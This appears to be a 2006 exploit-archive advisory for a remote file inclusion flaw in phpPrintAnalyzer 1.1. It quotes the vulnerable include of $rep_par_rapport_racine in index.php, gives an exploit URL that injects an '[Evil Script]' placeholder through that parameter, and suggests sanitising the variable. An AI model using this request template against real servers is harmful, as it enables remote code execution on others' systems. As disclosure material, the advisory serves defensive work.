--------------------------------------------------------------------------------------- phpPrintAnalyzer 1.1 rep_par_rapport_racine Remote File Inclusion --------------------------------------------------------------------------------------- Author : Sh3ll Date : 2006/04/27 Location : Iran - Tehran HomePage : http://www.sh3ll.ir Email : sh3ll[at]sh3ll[dot]ir Critical Level : Dangerous --------------------------------------------------------------------------------------- Affected Software Description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : phpPrintAnalyzer version : 1.1 URL : http://tpequet.free.fr/phpPrintAnalyzer Description : phpPrintAnalyzer is a Web Application for CUPS System to Analyze the "page_log" Files and Get HTML Graphics (with JpGraph) --------------------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~ in index.php We Found Vulnerability Script ----------------------------------------index.php-------------------------------------- .... <?php include($rep_par_rapport_racine."inc/img.inc.php"); ?> ... --------------------------------------------------------------------------------------- Exploit: ~~~~~~~ http://www.target.com/[phpPrintAnalyzer]/index.php?rep_par_rapport_racine=[Evil Script] Solution: ~~~~~~~~ Sanitize Variabel $rep_par_rapport_racine in index.php ---------------------------------------------------------------------------------------- Shoutz: ~~~~~~ ~ Special Greetz to My Best Friends Atena & N4sh3n4s ~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
